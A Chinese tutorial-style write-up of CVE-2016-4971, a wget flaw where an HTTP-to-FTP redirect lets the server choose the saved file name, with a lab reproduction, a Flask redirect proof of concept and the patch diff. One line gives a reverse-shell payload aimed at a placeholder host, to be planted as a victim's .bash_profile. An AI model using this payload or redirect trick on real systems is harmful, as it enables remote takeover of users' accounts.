7.1.3 CVE-2016-4971 wget 任意文件上传漏洞

下载文件

漏洞描述

wget 是一个从网络上自动下载文件的工具,支持通过 HTTP、HTTPS、FTP 三种最常见的 TCP/IP 协议。

漏洞发生在将 HTTP 服务重定向到 FTP 服务时,wget 会默认选择相信 HTTP 服务器,并且直接使用重定向的 FTP URL,而没有对其进行二次验证或对下载文件名进行适当的处理。如果攻击者提供了一个恶意的 URL,通过这种重定向可能达到任意文件的上传的问题,并且文件名和文件内容也是任意的。

漏洞复现

推荐使用的环境 备注
操作系统 Ubuntu 16.04 体系结构:64 位
漏洞软件 wget 版本号:1.17.1
所需软件 vsftpd 版本号:3.0.3

首先需要安装 ftp 服务器:

  1. $ sudo apt-get install vsftpd

修改其配置文件 /etc/vsftpd.conf,使匿名用户也可以访问:

  1. # Allow anonymous FTP? (Disabled by default).
  2. anonymous_enable=YES

然后我们需要一个 HTTP 服务,这里选择使用 Flask:

  1. $ sudo pip install flask

创建两个文件 noharm.txt 和 harm.txt,假设前者是我们请求的正常文件,后者是重定位后的恶意文件,如下:

  1. $ ls
  2. harm.txt httpServer.py noharm.txt
  3. $ cat noharm.txt
  4. "hello world"
  5. $ cat harm.txt
  6. "you've been hacked"
  7. $ sudo cp harm.txt /srv/ftp
  8. $ sudo python httpServer.py
  9. * Running on http://0.0.0.0:80/ (Press CTRL+C to quit)

httpServer.py 代码如下:

  1. #!/usr/bin/env python
  2. from flask import Flask, redirect
  3. app = Flask(__name__)
  4. @app.route("/noharm.txt")
  5. def test():
  6. return redirect("ftp://127.0.0.1/harm.txt")
  7. if __name__ == "__main__":
  8. app.run(host="0.0.0.0",port=80)

接下来在另一个 shell 里(记得切换到一个不一样的目录),执行下面的语句:

  1. $ ls | grep harm
  2. $ wget --version | head -n1
  3. GNU Wget 1.17.1 built on linux-gnu.
  4. $ wget 0.0.0.0/noharm.txt
  5. --2018-01-29 15:30:35-- http://0.0.0.0/noharm.txt
  6. Connecting to 0.0.0.0:80... connected.
  7. HTTP request sent, awaiting response... 302 FOUND
  8. Location: ftp://127.0.0.1/harm.txt [following]
  9. --2018-01-29 15:30:35-- ftp://127.0.0.1/harm.txt
  10. => noharm.txt
  11. Connecting to 127.0.0.1:21... connected.
  12. Logging in as anonymous ... Logged in!
  13. ==> SYST ... done. ==> PWD ... done.
  14. ==> TYPE I ... done. ==> CWD not needed.
  15. ==> SIZE harm.txt ... 21
  16. ==> PASV ... done. ==> RETR harm.txt ... done.
  17. Length: 21 (unauthoritative)
  18. noharm.txt 100%[==============================================>] 21 --.-KB/s in 0s
  19. 2018-01-29 15:30:35 (108 KB/s) - noharm.txt saved [21]
  20. $ ls | grep harm
  21. noharm.txt
  22. $ cat noharm.txt
  23. "you've been hacked"

可以看到发生了重定向,虽然下载的文件内容是重定位后的文件的内容(harm.txt),但文件名依然是一开始请求的文件名(noharm.txt),完全没有问题。

这样看来,该系统上的 wget 虽然是 1.17.1,但估计已经打过补丁了。我们直接编译安装原始的版本:

  1. $ sudo apt-get install libneon27-gnutls-dev
  2. $ wget https://ftp.gnu.org/gnu/wget/wget-1.17.1.tar.gz
  3. $ tar zxvf wget-1.17.1.tar.gz
  4. $ cd wget-1.17.1
  5. $ ./configure
  6. $ make && sudo make install

发出请求:

  1. $ wget 0.0.0.0/noharm.txt
  2. --2018-01-29 16:32:15-- http://0.0.0.0/noharm.txt
  3. Connecting to 0.0.0.0:80... connected.
  4. HTTP request sent, awaiting response... 302 FOUND
  5. Location: ftp://127.0.0.1/harm.txt [following]
  6. --2018-01-29 16:32:15-- ftp://127.0.0.1/harm.txt
  7. => harm.txt
  8. Connecting to 127.0.0.1:21... connected.
  9. Logging in as anonymous ... Logged in!
  10. ==> SYST ... done. ==> PWD ... done.
  11. ==> TYPE I ... done. ==> CWD not needed.
  12. ==> SIZE harm.txt ... 21
  13. ==> PASV ... done. ==> RETR harm.txt ... done.
  14. Length: 21 (unauthoritative)
  15. harm.txt 100%[==============================================>] 21 --.-KB/s in 0s
  16. 2018-01-29 16:32:15 (3.41 MB/s) - harm.txt saved [21]
  17. $ cat harm.txt
  18. "you've been hacked"

Bingo!!!这一次 harm.txt 没有被修改成原始请求的文件名。

在参考资料中,展示了一种针对 .bash_profile 的攻击,我们知道在刚登录 Linux 时,.bash_profile 会被执行,用于设置一些环境变量。但如果该文件是一个恶意的文件,比如 bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9980 0>&1 这样的 payload,执行后就会返回一个 shell 给攻击者。

如果某个人在自己的 home 目录下执行了 wget 请求,并且该目录下没有 .bash_profile,那么利用该漏洞,攻击这就可以将恶意的 .bash_profile 保存到这个人的 home 下。下一次启动时,恶意代码被执行,获得 shell。

漏洞分析

补丁

  1. $ git diff e996e322ffd42aaa051602da182d03178d0f13e1 src/ftp.c | cat
  2. commit e996e322ffd42aaa051602da182d03178d0f13e1
  3. Author: Giuseppe Scrivano <gscrivan@redhat.com>
  4. Date: Mon Jun 6 21:20:24 2016 +0200
  5. ftp: understand --trust-server-names on a HTTP->FTP redirect
  6. If not --trust-server-names is used, FTP will also get the destination
  7. file name from the original url specified by the user instead of the
  8. redirected url. Closes CVE-2016-4971.
  9. * src/ftp.c (ftp_get_listing): Add argument original_url.
  10. (getftp): Likewise.
  11. (ftp_loop_internal): Likewise. Use original_url to generate the
  12. file name if --trust-server-names is not provided.
  13. (ftp_retrieve_glob): Likewise.
  14. (ftp_loop): Likewise.
  15. Signed-off-by: Giuseppe Scrivano <gscrivan@redhat.com>
  16. diff --git a/src/ftp.c b/src/ftp.c
  17. index cc90c3d..88a9777 100644
  18. --- a/src/ftp.c
  19. +++ b/src/ftp.c
  20. @@ -236,7 +236,7 @@ print_length (wgint size, wgint start, bool authoritative)
  21. logputs (LOG_VERBOSE, !authoritative ? _(" (unauthoritative)\n") : "\n");
  22. }
  23. -static uerr_t ftp_get_listing (struct url *, ccon *, struct fileinfo **);
  24. +static uerr_t ftp_get_listing (struct url *, struct url *, ccon *, struct fileinfo **);
  25. static uerr_t
  26. get_ftp_greeting(int csock, ccon *con)
  27. @@ -315,7 +315,8 @@ init_control_ssl_connection (int csock, struct url *u, bool *using_control_secur
  28. and closes the control connection in case of error. If warc_tmp
  29. is non-NULL, the downloaded data will be written there as well. */
  30. static uerr_t
  31. -getftp (struct url *u, wgint passed_expected_bytes, wgint *qtyread,
  32. +getftp (struct url *u, struct url *original_url,
  33. + wgint passed_expected_bytes, wgint *qtyread,
  34. wgint restval, ccon *con, int count, wgint *last_expected_bytes,
  35. FILE *warc_tmp)
  36. {
  37. @@ -1188,7 +1189,7 @@ Error in server response, closing control connection.\n"));
  38. {
  39. bool exists = false;
  40. struct fileinfo *f;
  41. - uerr_t _res = ftp_get_listing (u, con, &f);
  42. + uerr_t _res = ftp_get_listing (u, original_url, con, &f);
  43. /* Set the DO_RETR command flag again, because it gets unset when
  44. calling ftp_get_listing() and would otherwise cause an assertion
  45. failure earlier on when this function gets repeatedly called
  46. @@ -1779,8 +1780,8 @@ exit_error:
  47. This loop either gets commands from con, or (if ON_YOUR_OWN is
  48. set), makes them up to retrieve the file given by the URL. */
  49. static uerr_t
  50. -ftp_loop_internal (struct url *u, struct fileinfo *f, ccon *con, char **local_file,
  51. - bool force_full_retrieve)
  52. +ftp_loop_internal (struct url *u, struct url *original_url, struct fileinfo *f,
  53. + ccon *con, char **local_file, bool force_full_retrieve)
  54. {
  55. int count, orig_lp;
  56. wgint restval, len = 0, qtyread = 0;
  57. @@ -1805,7 +1806,7 @@ ftp_loop_internal (struct url *u, struct fileinfo *f, ccon *con, char **local_fi
  58. {
  59. /* URL-derived file. Consider "-O file" name. */
  60. xfree (con->target);
  61. - con->target = url_file_name (u, NULL);
  62. + con->target = url_file_name (opt.trustservernames || !original_url ? u : original_url, NULL);
  63. if (!opt.output_document)
  64. locf = con->target;
  65. else
  66. @@ -1923,8 +1924,8 @@ ftp_loop_internal (struct url *u, struct fileinfo *f, ccon *con, char **local_fi
  67. /* If we are working on a WARC record, getftp should also write
  68. to the warc_tmp file. */
  69. - err = getftp (u, len, &qtyread, restval, con, count, &last_expected_bytes,
  70. - warc_tmp);
  71. + err = getftp (u, original_url, len, &qtyread, restval, con, count,
  72. + &last_expected_bytes, warc_tmp);
  73. if (con->csock == -1)
  74. con->st &= ~DONE_CWD;
  75. @@ -2092,7 +2093,8 @@ Removing file due to --delete-after in ftp_loop_internal():\n"));
  76. /* Return the directory listing in a reusable format. The directory
  77. is specifed in u->dir. */
  78. static uerr_t
  79. -ftp_get_listing (struct url *u, ccon *con, struct fileinfo **f)
  80. +ftp_get_listing (struct url *u, struct url *original_url, ccon *con,
  81. + struct fileinfo **f)
  82. {
  83. uerr_t err;
  84. char *uf; /* url file name */
  85. @@ -2113,7 +2115,7 @@ ftp_get_listing (struct url *u, ccon *con, struct fileinfo **f)
  86. con->target = xstrdup (lf);
  87. xfree (lf);
  88. - err = ftp_loop_internal (u, NULL, con, NULL, false);
  89. + err = ftp_loop_internal (u, original_url, NULL, con, NULL, false);
  90. lf = xstrdup (con->target);
  91. xfree (con->target);
  92. con->target = old_target;
  93. @@ -2136,8 +2138,9 @@ ftp_get_listing (struct url *u, ccon *con, struct fileinfo **f)
  94. return err;
  95. }
  96. -static uerr_t ftp_retrieve_dirs (struct url *, struct fileinfo *, ccon *);
  97. -static uerr_t ftp_retrieve_glob (struct url *, ccon *, int);
  98. +static uerr_t ftp_retrieve_dirs (struct url *, struct url *,
  99. + struct fileinfo *, ccon *);
  100. +static uerr_t ftp_retrieve_glob (struct url *, struct url *, ccon *, int);
  101. static struct fileinfo *delelement (struct fileinfo *, struct fileinfo **);
  102. static void freefileinfo (struct fileinfo *f);
  103. @@ -2149,7 +2152,8 @@ static void freefileinfo (struct fileinfo *f);
  104. If opt.recursive is set, after all files have been retrieved,
  105. ftp_retrieve_dirs will be called to retrieve the directories. */
  106. static uerr_t
  107. -ftp_retrieve_list (struct url *u, struct fileinfo *f, ccon *con)
  108. +ftp_retrieve_list (struct url *u, struct url *original_url,
  109. + struct fileinfo *f, ccon *con)
  110. {
  111. static int depth = 0;
  112. uerr_t err;
  113. @@ -2310,7 +2314,10 @@ Already have correct symlink %s -> %s\n\n"),
  114. else /* opt.retr_symlinks */
  115. {
  116. if (dlthis)
  117. - err = ftp_loop_internal (u, f, con, NULL, force_full_retrieve);
  118. + {
  119. + err = ftp_loop_internal (u, original_url, f, con, NULL,
  120. + force_full_retrieve);
  121. + }
  122. } /* opt.retr_symlinks */
  123. break;
  124. case FT_DIRECTORY:
  125. @@ -2321,7 +2328,10 @@ Already have correct symlink %s -> %s\n\n"),
  126. case FT_PLAINFILE:
  127. /* Call the retrieve loop. */
  128. if (dlthis)
  129. - err = ftp_loop_internal (u, f, con, NULL, force_full_retrieve);
  130. + {
  131. + err = ftp_loop_internal (u, original_url, f, con, NULL,
  132. + force_full_retrieve);
  133. + }
  134. break;
  135. case FT_UNKNOWN:
  136. logprintf (LOG_NOTQUIET, _("%s: unknown/unsupported file type.\n"),
  137. @@ -2386,7 +2396,7 @@ Already have correct symlink %s -> %s\n\n"),
  138. /* We do not want to call ftp_retrieve_dirs here */
  139. if (opt.recursive &&
  140. !(opt.reclevel != INFINITE_RECURSION && depth >= opt.reclevel))
  141. - err = ftp_retrieve_dirs (u, orig, con);
  142. + err = ftp_retrieve_dirs (u, original_url, orig, con);
  143. else if (opt.recursive)
  144. DEBUGP ((_("Will not retrieve dirs since depth is %d (max %d).\n"),
  145. depth, opt.reclevel));
  146. @@ -2399,7 +2409,8 @@ Already have correct symlink %s -> %s\n\n"),
  147. ftp_retrieve_glob on each directory entry. The function knows
  148. about excluded directories. */
  149. static uerr_t
  150. -ftp_retrieve_dirs (struct url *u, struct fileinfo *f, ccon *con)
  151. +ftp_retrieve_dirs (struct url *u, struct url *original_url,
  152. + struct fileinfo *f, ccon *con)
  153. {
  154. char *container = NULL;
  155. int container_size = 0;
  156. @@ -2449,7 +2460,7 @@ Not descending to %s as it is excluded/not-included.\n"),
  157. odir = xstrdup (u->dir); /* because url_set_dir will free
  158. u->dir. */
  159. url_set_dir (u, newdir);
  160. - ftp_retrieve_glob (u, con, GLOB_GETALL);
  161. + ftp_retrieve_glob (u, original_url, con, GLOB_GETALL);
  162. url_set_dir (u, odir);
  163. xfree (odir);
  164. @@ -2508,14 +2519,15 @@ is_invalid_entry (struct fileinfo *f)
  165. GLOB_GLOBALL, use globbing; if it's GLOB_GETALL, download the whole
  166. directory. */
  167. static uerr_t
  168. -ftp_retrieve_glob (struct url *u, ccon *con, int action)
  169. +ftp_retrieve_glob (struct url *u, struct url *original_url,
  170. + ccon *con, int action)
  171. {
  172. struct fileinfo *f, *start;
  173. uerr_t res;
  174. con->cmd |= LEAVE_PENDING;
  175. - res = ftp_get_listing (u, con, &start);
  176. + res = ftp_get_listing (u, original_url, con, &start);
  177. if (res != RETROK)
  178. return res;
  179. /* First: weed out that do not conform the global rules given in
  180. @@ -2611,7 +2623,7 @@ ftp_retrieve_glob (struct url *u, ccon *con, int action)
  181. if (start)
  182. {
  183. /* Just get everything. */
  184. - res = ftp_retrieve_list (u, start, con);
  185. + res = ftp_retrieve_list (u, original_url, start, con);
  186. }
  187. else
  188. {
  189. @@ -2627,7 +2639,7 @@ ftp_retrieve_glob (struct url *u, ccon *con, int action)
  190. {
  191. /* Let's try retrieving it anyway. */
  192. con->st |= ON_YOUR_OWN;
  193. - res = ftp_loop_internal (u, NULL, con, NULL, false);
  194. + res = ftp_loop_internal (u, original_url, NULL, con, NULL, false);
  195. return res;
  196. }
  197. @@ -2647,8 +2659,8 @@ ftp_retrieve_glob (struct url *u, ccon *con, int action)
  198. of URL. Inherently, its capabilities are limited on what can be
  199. encoded into a URL. */
  200. uerr_t
  201. -ftp_loop (struct url *u, char **local_file, int *dt, struct url *proxy,
  202. - bool recursive, bool glob)
  203. +ftp_loop (struct url *u, struct url *original_url, char **local_file, int *dt,
  204. + struct url *proxy, bool recursive, bool glob)
  205. {
  206. ccon con; /* FTP connection */
  207. uerr_t res;
  208. @@ -2669,16 +2681,17 @@ ftp_loop (struct url *u, char **local_file, int *dt, struct url *proxy,
  209. if (!*u->file && !recursive)
  210. {
  211. struct fileinfo *f;
  212. - res = ftp_get_listing (u, &con, &f);
  213. + res = ftp_get_listing (u, original_url, &con, &f);
  214. if (res == RETROK)
  215. {
  216. if (opt.htmlify && !opt.spider)
  217. {
  218. + struct url *url_file = opt.trustservernames ? u : original_url;
  219. char *filename = (opt.output_document
  220. ? xstrdup (opt.output_document)
  221. : (con.target ? xstrdup (con.target)
  222. - : url_file_name (u, NULL)));
  223. + : url_file_name (url_file, NULL)));
  224. res = ftp_index (filename, u, f);
  225. if (res == FTPOK && opt.verbose)
  226. {
  227. @@ -2723,11 +2736,13 @@ ftp_loop (struct url *u, char **local_file, int *dt, struct url *proxy,
  228. /* ftp_retrieve_glob is a catch-all function that gets called
  229. if we need globbing, time-stamping, recursion or preserve
  230. permissions. Its third argument is just what we really need. */
  231. - res = ftp_retrieve_glob (u, &con,
  232. + res = ftp_retrieve_glob (u, original_url, &con,
  233. ispattern ? GLOB_GLOBALL : GLOB_GETONE);
  234. }
  235. else
  236. - res = ftp_loop_internal (u, NULL, &con, local_file, false);
  237. + {
  238. + res = ftp_loop_internal (u, original_url, NULL, &con, local_file, false);
  239. + }
  240. }
  241. if (res == FTPOK)
  242. res = RETROK;

通过查看补丁的内容,我们发现主要的修改有两处,一个是函数 ftp_loop_internal(),增加了对是否使用了参数 --trust-server-names 及是否存在重定向进行了判断:

  1. con->target = url_file_name (opt.trustservernames || !original_url ? u : original_url, NULL);

另一个是函数 ftp_loop(),也是一样的:

  1. struct url *url_file = opt.trustservernames ? u : original_url;

修改之后,如果没有使用参数 --trust-server-names,则默认使用原始 URL 中的文件名替换重定向后 URL 中的文件名。问题就这样解决了。

参考资料